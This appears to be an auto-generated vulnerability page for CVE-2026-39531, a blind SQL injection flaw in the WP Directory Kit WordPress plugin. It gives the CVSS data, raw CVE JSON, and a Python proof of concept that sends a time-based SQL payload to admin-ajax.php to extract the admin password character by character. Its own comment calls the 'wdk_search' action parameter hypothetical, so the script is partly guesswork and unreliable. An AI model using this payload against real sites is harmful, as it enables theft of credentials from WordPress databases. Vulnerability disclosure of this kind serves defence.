Security Vulnerability Report
CVE-2026-39531 CVSS 9.3 CRITICAL

Published: 2026-05-21 16:16:23
Last Modified: 2026-05-21 19:10:37

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection. This issue affects WP Directory Kit: from n/a through 1.5.0.

CVSS Details

CVSS Score: 9.3
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WP Directory Kit <= 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-39531 PoC Generator (Blind SQL Injection)
# Target: WP Directory Kit <= 1.5.0
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Example payload for time-based blind injection
payload = "1' AND (SELECT SUBSTRING(password, 1, 1) FROM wp_users WHERE ID=1) = 'a' AND SLEEP(5)-- -"

data = {
    "action": "wdk_search",  # Action parameter is hypothetical based on common WP structures
    "term": payload
}

try:
    print("[+] Sending payload to target...")
    response = requests.post(target_url, data=data, timeout=10)

    # Check if the response time indicates a successful delay
    if response.elapsed.total_seconds() > 5:
        print("[+] Vulnerability confirmed: Response delayed (Blind SQL Injection).")
    else:
        print("[-] Vulnerability not detected or payload incorrect.")
except Exception as e:
    print(f"Error: {e}")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39531", "sourceIdentifier": "[email protected]", "published": "2026-05-21T16:16:23.030", "lastModified": "2026-05-21T19:10:36.607", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection.\n\nThis issue affects WP Directory Kit: from n/a through 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/wpdirectorykit/vulnerability/wordpress-wp-directory-kit-plugin-1-5-0-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}